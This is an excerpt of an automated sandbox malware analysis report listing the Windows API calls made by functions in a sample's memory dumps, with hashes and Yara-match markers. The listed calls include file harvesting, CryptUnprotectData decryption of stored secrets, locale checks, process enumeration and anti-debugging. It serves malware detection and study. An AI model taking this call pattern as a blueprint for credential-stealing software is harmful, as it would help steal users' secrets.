                                            • Instruction ID: 326bb5b0aa74a90383757dcb1b901c182a931739bb482d9a01dd600d45254bae
                                            • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                            • Instruction Fuzzy Hash: 61B16176A117589BCB24FF60DD90EEE777DAF96300F008199A44A9B190EF309B48CF91
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                            • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                            • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                            • String ID: \*.*$@
                                            • API String ID: 433455689-2355794846
                                            • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                            • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                            • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                            • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 03021B8A
                                            • StrCmpCA.SHLWAPI(?,0042526C), ref: 03021BDA
                                            • StrCmpCA.SHLWAPI(?,00425314), ref: 03021BF0
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 03021FA7
                                            • DeleteFileA.KERNEL32(00000000), ref: 03022031
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 03022087
                                            • FindClose.KERNEL32(000000FF), ref: 03022099
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 1415058207-0
                                            • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                            • Instruction ID: 5192a2b96d4813821d6975cb287a46e6491b86a6e7ad23d2eed5d8dfec3e473f
                                            • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                            • Instruction Fuzzy Hash: 13121F76A127589BCB19FB60CD94EEEB37DAF96300F4441D9A1466A090EF346F88CF50
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 0302E0C5
                                            • StrCmpCA.SHLWAPI(?,004214C8), ref: 0302E115
                                            • StrCmpCA.SHLWAPI(?,004214CC), ref: 0302E12B
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0302E647
                                            • FindClose.KERNEL32(000000FF), ref: 0302E659
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2325840235-0
                                            • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                            • Instruction ID: eb05b25c4d19a648870228fc18b900563724e9b983b882a83c3f87775745e98c
                                            • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                            • Instruction Fuzzy Hash: F1F1D2766217689BCB19FB60DD94EEEB33DAF96301F4441DA908A660A1DF305F88CF50
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                            • LocalFree.KERNEL32(00000000), ref: 00417D22
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                            • String ID: /
                                            • API String ID: 3090951853-4001269591
                                            • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                            • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                            • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                            • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                            APIs
                                            • memset.MSVCRT ref: 0040C853
                                            • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02E26060), ref: 0040C871
                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                            • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                            • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                            • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                            • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1498829745-0
                                            • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                            • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                            • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                            • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                            APIs
                                            • memset.MSVCRT ref: 0302CABA
                                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0302CAD8
                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0302CAE3
                                            • memcpy.MSVCRT(?,?,?), ref: 0302CB79
                                            • lstrcat.KERNEL32(?,00420B46), ref: 0302CBAA
                                            • lstrcat.KERNEL32(?,00420B47), ref: 0302CBBE
                                            • lstrcat.KERNEL32(?,00420B4E), ref: 0302CBDF
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1498829745-0
                                            • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                            • Instruction ID: bba20dae0d73e5999e5008ed15e9b88f721418d9c9ba6f432e8b3ffbbff80ee0
                                            • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                            • Instruction Fuzzy Hash: DA41607894422AEFDB10DFD4DD88BEEBBB8BB44304F1045A9F609A6280D7745B84CF91
                                            APIs
                                            • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,02E24D60,?,0042110C,?,00000000,?), ref: 0041696C
                                            • sscanf.NTDLL ref: 00416999
                                            • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,02E24D60,?,0042110C), ref: 004169B2
                                            • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02E24D60,?,0042110C), ref: 004169C0
                                            • ExitProcess.KERNEL32 ref: 004169DA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$System$File$ExitProcesssscanf
                                            • String ID: B
                                            • API String ID: 2533653975-2248957098
                                            • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                            • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                            • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                            • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                            APIs
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                            • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptLocalString$AllocFree
                                            • String ID: N@
                                            • API String ID: 4291131564-4229412743
                                            • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                            • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                            • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                            • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 03037E48
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 03037E60
                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 03037E74
                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 03037EC9
                                            • LocalFree.KERNEL32(00000000), ref: 03037F89
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                            • String ID:
                                            • API String ID: 3090951853-0
                                            • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                            • Instruction ID: ae32c7f2174589e316dae3b4f6b55d3ca27eb2a58cd355ef5d1a33dc51f6957d
                                            • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                            • Instruction Fuzzy Hash: 88413C75A52218AFCB24DB94DC88BEDB3B8FB46700F1041D9E009A6190DB746F85CF91
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                            • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                            • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 2579439406-0
                                            • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                            • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                            • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                            • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 0303BE09
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0303BE1E
                                            • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0303BE29
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0303BE45
                                            • TerminateProcess.KERNEL32(00000000), ref: 0303BE4C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 2579439406-0
                                            • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                            • Instruction ID: 7b0195a8eb0c3921500079d57c1bff329ece19e8bc04c7a1e108441707f033df
                                            • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                            • Instruction Fuzzy Hash: 7721A3BC901305DFDB14DF69F8896963BE4FB0A315F504079E90987264EBB05981EF49
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                            • String ID:
                                            • API String ID: 3657800372-0
                                            • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                            • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                            • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                            • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 030274B4
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 030274BB
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 030274E8
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0302750B
                                            • LocalFree.KERNEL32(?), ref: 03027515
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                            • String ID:
                                            • API String ID: 2609814428-0
                                            • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                            • Instruction ID: 8d42fc239a256bfae809119cb11a695d9e15e7eb9e4a19589608574dbe3da31f
                                            • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                            • Instruction Fuzzy Hash: D0011275B80208BFEB10DFD4DD45F9DB7B9EB44B04F104155FB05AB2C1D6B0AA008B65
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                            • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                            • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                            • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 420147892-0
                                            • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                            • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                            • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                            • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03039885
                                            • Process32First.KERNEL32(00420ACA,00000128), ref: 03039899
                                            • Process32Next.KERNEL32(00420ACA,00000128), ref: 030398AE
                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 030398C3
                                            • CloseHandle.KERNEL32(00420ACA), ref: 030398E1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 420147892-0
                                            • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                            • Instruction ID: 85f2e5ff8e23498443d2237f7b04aa154e0fc5f580ed919a568281c51f1a2599
                                            • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                            • Instruction Fuzzy Hash: 83010C79A51208FFDB20DFE4CD54BEDB7FDEB49700F004189A505A6280D7749A40CF51
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 0302E709
                                            • StrCmpCA.SHLWAPI(?,004214F8), ref: 0302E759
                                            • StrCmpCA.SHLWAPI(?,004214FC), ref: 0302E76F
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0302EE46
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                            • String ID:
                                            • API String ID: 433455689-0
                                            • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                            • Instruction ID: 05dbaedaec7f061dea21eba0dde4f6252e12e07b81a5d20ac9e6d0d4222d29a3
                                            • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                            • Instruction Fuzzy Hash: BE123C3AB127589BCB18FB60DD94EED737DAF97300F4441A9A18A5A090EF345B88CF51
                                            APIs
                                            • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
